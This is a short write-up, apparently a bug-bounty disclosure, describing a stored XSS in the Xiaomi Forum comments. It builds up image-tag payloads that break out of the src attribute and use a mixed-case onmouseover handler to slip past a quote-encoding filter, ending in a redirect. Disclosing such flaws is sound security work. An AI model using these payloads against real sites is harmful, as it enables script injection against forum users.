Exploiting XSS via Markdown on Xiaomi
What is Markdown?
Markdown is a text-to-HTML conversion tool that can be used when creating web content. By using Markdown, we can write HTML content in a format that is easy-to-read and easy-to-write. (Source: www.codepolitan.com)This vulnerability is in the comments section of the Xiaomi Forum (c.mi.com).
First, I try to post images in the comments,
Payloads:
[img]https://server/image.jpg[/img]<img src="https://server/image.jpg" />Next, I try to insert double quotes after the image URL,
Payloads:
[img]https://server/image.jpg"[/img]<img src="https://server/image.jpg"" />Now let's try to insert the JavaScript event handler attribute,
Payloads:
[img]https://server/image.jpg"onmouseover=[/img]<img src="https://server/image.jpg%22onmouseover=" />The server immediately changes the character (") to %22, now I try to use some uppercase in the event handler,
Payloads:
[img]https://server/image.jpg"OnMoUsEoVeR=[/img]<img src="https://server/image.jpg"OnMoUsEoVeR=" />Next, the final payloads,
Payloads:
[img]https://server/image.jpg"OnMoUsEoVeR=window.location="//google.com[/img]<img src="https://server/image.jpg"OnMoUsEoVeR=window.location="//google.com" />
#HappyHacking Related Post: